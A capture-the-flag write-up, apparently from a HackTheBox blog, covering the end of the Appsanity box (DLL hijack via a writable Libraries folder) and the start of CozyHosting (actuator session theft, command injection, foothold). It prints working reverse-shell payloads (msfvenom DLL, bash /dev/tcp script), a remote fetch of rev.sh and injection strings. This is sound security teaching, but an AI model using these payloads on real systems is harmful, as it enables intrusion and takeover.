Given that all the interesting strings in the binary were used between messages about uploading, I’ll start by focusing on the upload command. I’ll connect to my local instance and enter upload 0xdf (as the command takes an “external source”). It’s not important what I put for the source, but I want something that might fail so I can see where it fails.
When I do, ProcMon shows another failure:
I’ll move my ReportManagement directory into C:\Program Files and continue. Now there are no errors.
I’ll run the program in x64dbg, but it doesn’t reach the CreateProcessW call.
The writable Libraries directory seems important, so I’ll go back to where that’s used. The code is still very hard to understand, but there are references to directory_iterator and directory_entry:
Given that, I’ll create a few files in my local Libraries:
PS C:\Program Files\ReportManagement\Libraries > ls
Directory: C:\Program Files\ReportManagement\Libraries
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2024 11:26 AM 0 test.dll
-a---- 3/8/2024 11:26 AM 0 test.exe
-a---- 3/8/2024 11:26 AM 0 test.txt
Now I’ll start the program in x64dbg. There’s a while loop starting at 140004900 that is only entered if there are files in Libraries. Stepping into the loop, it loads the string .dll, and then test.dll:
Still, it doesn’t reach CreateProcessW. A bit further down, the “externalupload” string is referenced in a memcmp:
To get here, there are a series of checks. The loop goes over each file in Libraries. If a file has the .dll extension, the code finds the first “e” in its name (the memchr call at 1400004cb5) and compares the string from that point to “externalupload” (the memcmp at 140004ce0). If that matches, it reaches the CreateProcessW call (at 140005387):
The command would be cmd.exe /c ReportManagementHelper Libraries\externalupload.dll.
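Reconstructing those checks in Python (my reading of the disassembly, not the actual source, and assuming the comparison covers the full remaining string):

```python
def triggers_helper(filename):
    """Mirror the loop's checks: a file in Libraries launches the
    helper if it ends in .dll and the name from its first 'e'
    onward reads "externalupload"."""
    if not filename.endswith(".dll"):
        return False
    stem = filename[:-len(".dll")]
    idx = stem.find("e")      # the memchr for 'e'
    # the memcmp against "externalupload"
    return idx != -1 and stem[idx:] == "externalupload"

print(triggers_helper("externalupload.dll"))  # True
print(triggers_helper("test.dll"))            # False
```

Under this reading, a name like myexternalupload.dll would also pass, since the first “e” starts the matching suffix.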
I don’t have access to ReportManagementHelper.exe, but it seems that if there’s an externalupload.dll in Libraries, it will be passed to that executable when it’s invoked, which suggests it will be loaded. Since I can write to Libraries, I’ll generate a malicious DLL that creates a reverse shell, upload it, and then connect and trigger it.
I haven’t seen any AV running here, so the simplest idea is to generate a DLL payload using msfvenom from Metasploit.
oxdf@hacky$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=443 -f dll -o externalupload.dll -a x64 --platform windows
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: externalupload.dll
I’m using an unstaged payload so I can catch it with nc. If I had used the staged windows/x64/shell/reverse_tcp, I would have had to catch it with Metasploit.
I’ll upload this to the Libraries directory:
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> upload externalupload.dll
Info: Uploading externalupload.dll to C:\Program Files\ReportManagement\Libraries\externalupload.dll
Data: 12288 bytes of 12288 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> ls
Directory: C:\Program Files\ReportManagement\Libraries
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2024 9:19 AM 9216 externalupload.dll
Now I’ll connect to the service over my Chisel tunnel and trigger it:
oxdf@hacky$ rlwrap nc localhost 10000
Reports Management administrative console. Type "help" to view available commands.
upload 0xdf
Attempting to upload to external source.
It hangs, and at my listener there’s a shell as administrator:
oxdf@hacky$ rlwrap -cAr nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.238 49268
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\ReportManagement> whoami
appsanity\administrator
And root.txt:
C:\Users\Administrator\Desktop> type root.txt
78eae46d************************
CozyHosting is a web hosting company with a website running on Java Spring Boot. I’ll find a Spring Boot Actuator path that leaks the session id of a logged-in user, and use that to get access to the site. Once there, I’ll find command injection in an admin feature to get a foothold. I’ll pull database creds from the Java Jar file and use them to get the admin’s hash on the website from Postgres, which is also the user’s password on the box. From there, I’ll abuse sudo ssh with the ProxyCommand option to get root.
Name | CozyHosting Play on HackTheBox |
---|---|
Release Date | 02 Sep 2023 |
Retire Date | 02 Mar 2024 |
OS | Linux |
Base Points | Easy [20] |
Rated Difficulty | |
Radar Graph | |
00:11:50 | |
00:12:35 | |
Creator |
nmap finds two open TCP ports, SSH (22) and HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.230
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 18:51 EST
Nmap scan report for 10.10.11.230
Host is up (0.12s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.230
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 18:52 EST
Nmap scan report for 10.10.11.230
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.
The HTTP server on 80 is redirecting to cozyhosting.htb. Given the use of host-based routing, I’ll fuzz for other subdomains that reply differently, but not find any.
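Vhost fuzzing like this works by re-sending the same request with different Host headers and flagging any response that differs from the default. A sketch of the request construction (tools like ffuf or wfuzz do this for real; the candidate names here are illustrative):

```python
def vhost_request(host):
    """Build a raw HTTP/1.1 GET request for a candidate virtual host."""
    return (
        "GET / HTTP/1.1\r\n"
        "Host: {}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).format(host).encode()

# Send each over a TCP socket to the target and compare response
# sizes against the default vhost's response.
candidates = ["{}.cozyhosting.htb".format(s) for s in ("dev", "admin", "staging")]
requests = [vhost_request(c) for c in candidates]
```

The comparison is usually on response length or status code, filtering out whatever the catch-all vhost returns.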
The site is for a web hosting company:
All of the links on the page except for the “Login” button at the top right go to other places on the page.
The login page asks for username and password:
Some simple guesses like admin / admin don’t work.
The HTTP response headers show nginx as the web server:
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 27 Feb 2024 00:02:38 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Language: en-US
Content-Length: 12706
There are some other less common headers, but nothing that identifies what’s in use. When I try to log in, even on failure, there’s a cookie set:
HTTP/1.1 302
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 27 Feb 2024 11:23:38 GMT
Content-Length: 0
Location: http://cozyhosting.htb/login?error
Connection: close
Set-Cookie: JSESSIONID=1557523182BEB62C96303F5C105972D5; Path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
JSESSIONID suggests a Java-based web framework.
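Default session cookie names are a handy fingerprint. A small lookup of common defaults (a heuristic — apps can rename their cookies):

```python
# Common default session cookie names and the stacks they hint at.
COOKIE_HINTS = {
    "JSESSIONID": "Java servlet containers (Tomcat, Jetty; Spring, JSF)",
    "PHPSESSID": "PHP",
    "ASP.NET_SessionId": "ASP.NET",
    "CFID": "Adobe ColdFusion",
    "laravel_session": "Laravel",
    "ci_session": "CodeIgniter",
    "session": "Flask (default cookie name)",
}

def guess_framework(set_cookie):
    """Guess the backend from a Set-Cookie header value."""
    name = set_cookie.split("=", 1)[0].strip()
    return COOKIE_HINTS.get(name, "unknown")

print(guess_framework("JSESSIONID=1557523182BEB62C96303F5C105972D5; Path=/; HttpOnly"))
```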
The 404 page is interesting:
That matches the default error page for Java Spring Boot:
I’ll run feroxbuster against the site:
oxdf@hacky$ feroxbuster -u http://cozyhosting.htb
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 97l 196w 4431c http://cozyhosting.htb/login
204 GET 0l 0w 0c http://cozyhosting.htb/logout
401 GET 1l 1w 97c http://cozyhosting.htb/admin
200 GET 285l 745w 12706c http://cozyhosting.htb/
500 GET 1l 1w 73c http://cozyhosting.htb/error
200 GET 285l 745w 12706c http://cozyhosting.htb/index
400 GET 1l 32w 435c http://cozyhosting.htb/[
400 GET 1l 32w 435c http://cozyhosting.htb/plain]
400 GET 1l 32w 435c http://cozyhosting.htb/]
400 GET 1l 32w 435c http://cozyhosting.htb/quote]
400 GET 1l 32w 435c http://cozyhosting.htb/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-9]
[####################] - 2m 30000/30000 0s found:12 errors:0
[####################] - 2m 30000/30000 226/s http://cozyhosting.htb/
There’s a /admin page that requires auth. /error shows an error similar to the 404 page:
SecLists has a wordlist specific to Spring Boot. I’ll run feroxbuster again with this list:
oxdf@hacky$ feroxbuster -u http://cozyhosting.htb -w /opt/SecLists/Discovery/Web-Content/spring-boot.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/spring-boot.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/tz
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/language
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/pwd
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/hostname
200 GET 285l 745w 12706c http://cozyhosting.htb/
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
200 GET 1l 1w 95c http://cozyhosting.htb/actuator/sessions
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/path
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/lang
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/home
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/spring.jmx.enabled
200 GET 1l 120w 4957c http://cozyhosting.htb/actuator/env
200 GET 1l 1w 15c http://cozyhosting.htb/actuator/health
200 GET 1l 108w 9938c http://cozyhosting.htb/actuator/mappings
200 GET 1l 542w 127224c http://cozyhosting.htb/actuator/beans
[####################] - 2s 113/113 0s found:13 errors:0
[####################] - 1s 113/113 81/s http://cozyhosting.htb/
The /actuator path is interesting, and everything else found is a part of it. Spring Boot includes a set of features designed for monitoring, managing, and debugging applications, known as actuators. /actuator/mappings gives a detailed list of the application’s endpoints, including not only the actuators but also the application’s other routes:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/mappings | jq .
{
"contexts": {
"application": {
"mappings": {
"dispatcherServlets": {
"dispatcherServlet": [
{
"handler": "Actuator web endpoint 'beans'",
"predicate": "{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/beans"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'health-path'",
"predicate": "{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/health/**"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'mappings'",
"predicate": "{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/mappings"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator root web endpoint",
"predicate": "{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.WebMvcEndpointHandlerMapping.WebMvcLinksHandler",
"name": "links",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljakarta/servlet/http/HttpServletResponse;)Ljava/util/Map;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'env'",
"predicate": "{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/env"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'env-toMatch'",
"predicate": "{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/env/{toMatch}"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'sessions'",
"predicate": "{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/sessions"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'health'",
"predicate": "{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/health"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)",
"predicate": "{ [/error], produces [text/html]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController",
"name": "errorHtml",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljakarta/servlet/http/HttpServletResponse;)Lorg/springframework/web/servlet/ModelAndView;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [],
"params": [],
"patterns": [
"/error"
],
"produces": [
{
"mediaType": "text/html",
"negated": false
}
]
}
}
},
{
"handler": "htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)",
"predicate": "{POST [/executessh]}",
"details": {
"handlerMethod": {
"className": "htb.cloudhosting.compliance.ComplianceService",
"name": "executeOverSsh",
"descriptor": "(Ljava/lang/String;Ljava/lang/String;Ljakarta/servlet/http/HttpServletResponse;)V"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"POST"
],
"params": [],
"patterns": [
"/executessh"
],
"produces": []
}
}
},
{
"handler": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#error(HttpServletRequest)",
"predicate": "{ [/error]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController",
"name": "error",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;)Lorg/springframework/http/ResponseEntity;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [],
"params": [],
"patterns": [
"/error"
],
"produces": []
}
}
},
{
"handler": "ParameterizableViewController [view=\"admin\"]",
"predicate": "/admin"
},
{
"handler": "ParameterizableViewController [view=\"addhost\"]",
"predicate": "/addhost"
},
{
"handler": "ParameterizableViewController [view=\"index\"]",
"predicate": "/index"
},
{
"handler": "ParameterizableViewController [view=\"login\"]",
"predicate": "/login"
},
{
"handler": "ResourceHttpRequestHandler [classpath [META-INF/resources/webjars/]]",
"predicate": "/webjars/**"
},
{
"handler": "ResourceHttpRequestHandler [classpath [META-INF/resources/], classpath [resources/], classpath [static/], classpath [public/], ServletContext [/]]",
"predicate": "/**"
}
]
},
"servletFilters": [
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "requestContextFilter",
"className": "org.springframework.boot.web.servlet.filter.OrderedRequestContextFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "Tomcat WebSocket (JSR356) Filter",
"className": "org.apache.tomcat.websocket.server.WsFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "serverHttpObservationFilter",
"className": "org.springframework.web.filter.ServerHttpObservationFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "characterEncodingFilter",
"className": "org.springframework.boot.web.servlet.filter.OrderedCharacterEncodingFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "springSecurityFilterChain",
"className": "org.springframework.boot.web.servlet.DelegatingFilterProxyRegistrationBean$1"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "formContentFilter",
"className": "org.springframework.boot.web.servlet.filter.OrderedFormContentFilter"
}
],
"servlets": [
{
"mappings": [
"/"
],
"name": "dispatcherServlet",
"className": "org.springframework.web.servlet.DispatcherServlet"
}
]
}
}
}
}
That’s a ton of data, but with some jq foo I can get a nice list:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/mappings | jq -c '.contexts.application.mappings.dispatcherServlets
.dispatcherServlet | .[] | [.handler, .predicate]'
["Actuator web endpoint 'beans'","{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'health-path'","{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'mappings'","{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator root web endpoint","{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'env'","{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'env-toMatch'","{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'sessions'","{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'health'","{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)","{ [/error], produces [text/html]}"]
["htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)","{POST [/executessh]}"]
["org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#error(HttpServletRequest)","{ [/error]}"]
["ParameterizableViewController [view=\"admin\"]","/admin"]
["ParameterizableViewController [view=\"addhost\"]","/addhost"]
["ParameterizableViewController [view=\"index\"]","/index"]
["ParameterizableViewController [view=\"login\"]","/login"]
["ResourceHttpRequestHandler [classpath [META-INF/resources/webjars/]]","/webjars/**"]
["ResourceHttpRequestHandler [classpath [META-INF/resources/], classpath [resources/], classpath [static/], classpath [public/], ServletContext [/]]","/**"]
Besides the standard actuator endpoints, there are /addhost and /executessh, but I’ll come back to those.
/actuator/env leads to what look like configuration values, but a lot of the interesting ones (and some uninteresting ones) are masked, shown as strings of “*”.
/actuator/sessions
is immediately interesting:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/sessions | jq .
{
"1AB37C626597DADB7425C1273F7DA678": "kanderson"
}
If I try and fail to log in a few times, more sessions show up:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/sessions | jq .
{
"EEE571008BF31ADB2E904F4E8CBF5ABB": "UNAUTHORIZED",
"E1CE43B04CC6C958A7496877E331256D": "UNAUTHORIZED",
"2926B07C6C6B8CB0B92A5AE5DF5AE2B6": "UNAUTHORIZED",
"B3C02C5C13A99CCEFC3AF469D28374C9": "UNAUTHORIZED",
"C987ACE5C53875AE151372328A544FAF": "kanderson"
}
I’ll go into Firefox dev tools, under Storage -> Cookies, and replace the value for JSESSIONID with the kanderson user’s cookie.
Now when I refresh /login
or visit /admin
, there’s a panel and I’m authenticated as K. Anderson:
The interesting part of the page is the form at the bottom. If I submit my IP as the hostname and 0xdf as the username, it returns an error after a short wait:
This is a POST request to /executessh
(noticed above).
POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin?error=ssh:%20connect%20to%20host%2010.10.14.6%20port%2022:%20Connection%20timed%20out
Cookie: JSESSIONID=C987ACE5C53875AE151372328A544FAF
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
host=10.10.14.6&username=0xdf
I’ll try that again with Wireshark running, but there’s no connection to my host. There must be a firewall blocking outbound connections.
I’ll try having it target localhost
. It’s a different error:
Based on the error message, and that it said it’s using a private key, it seems likely that the server is running ssh -i [key] [username]@[hostname]
to connect. If that’s the case, I can test for command injection vulnerabilities. My first attempt returns “Invalid hostname!”:
This indicates that there’s some kind of filtering going on. I’ll try & and | instead of ;, but get the same result. Before fuzzing to see which characters are banned, I’ll try the username field instead. It returns a different error message:
There are a couple of ways to get whitespace without literal spaces in a Linux shell context. I’ll use the Bash ${IFS} variable, which expands to whitespace, and it kind of works:
It’s making the command:
ssh -i [key] 0xdf;ping${IFS}-c${IFS}1${IFS}10.10.14.6@localhost
It’s interesting that it handles 0xdf as the IP 0.0.0.223 (0xdf is hex for 223), but that’s not important. It’s failing the SSH connection, and then trying to ping 10.10.14.6@localhost. So my command is a bit broken, but the injection is working. I’ll add a comment (#) to the end:
It shows failure, but on my box with tcpdump, I see an ICMP packet:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:57:55.045594 IP 10.10.11.230 > 10.10.14.6: ICMP echo request, id 5, seq 1, length 64
10:57:55.045627 IP 10.10.14.6 > 10.10.11.230: ICMP echo reply, id 5, seq 1, length 64
That’s command injection!
Alternatively, I can get spaces into the command with Bash brace expansion, so the username 0xdf;{ping,-c,1,10.10.14.6};# works as well, making:
ssh -i [key] 0xdf;{ping,-c,1,10.10.14.6};#@localhost
Which expands to:
ssh -i [key] 0xdf;ping -c 1 10.10.14.6;#@localhost
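Both whitespace tricks (and the trailing comment) are easy to rehearse locally before firing them at the target. This sketch uses echo in place of the real payload:

```shell
# ${IFS} expands to whitespace, so the shell splits this into: echo injected via IFS
bash -c 'echo${IFS}injected${IFS}via${IFS}IFS'      # -> injected via IFS

# Brace expansion inserts spaces between the comma-separated words
bash -c '{echo,injected,via,braces}'                # -> injected via braces

# A trailing ;# comments out whatever the server appends (e.g. @localhost)
bash -c 'echo${IFS}injected;#@localhost'            # -> injected
```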
Java applications can be very tricky about piping and special characters in processes, so I’ll go the simple route of writing a Bash script to disk and then running it. I’ll create a reverse shell script locally called rev.sh
:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/443 0>&1
I’ll switch my requests over to Burp Repeater for quicker sending. I’ll use curl
to fetch rev.sh
from my server:
It works:
oxdf@hacky$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.230 - - [27/Feb/2024 11:05:08] "GET /rev.sh HTTP/1.1" 200 -
But there’s an error in the response:
If I write it to /tmp/rev.sh instead, it seems to work:
I’ll submit another request to run bash /tmp/rev.sh
:
The request just hangs, but at my listening nc
, there’s a shell:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.230 51348
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$
I’ll upgrade my shell using the script technique:
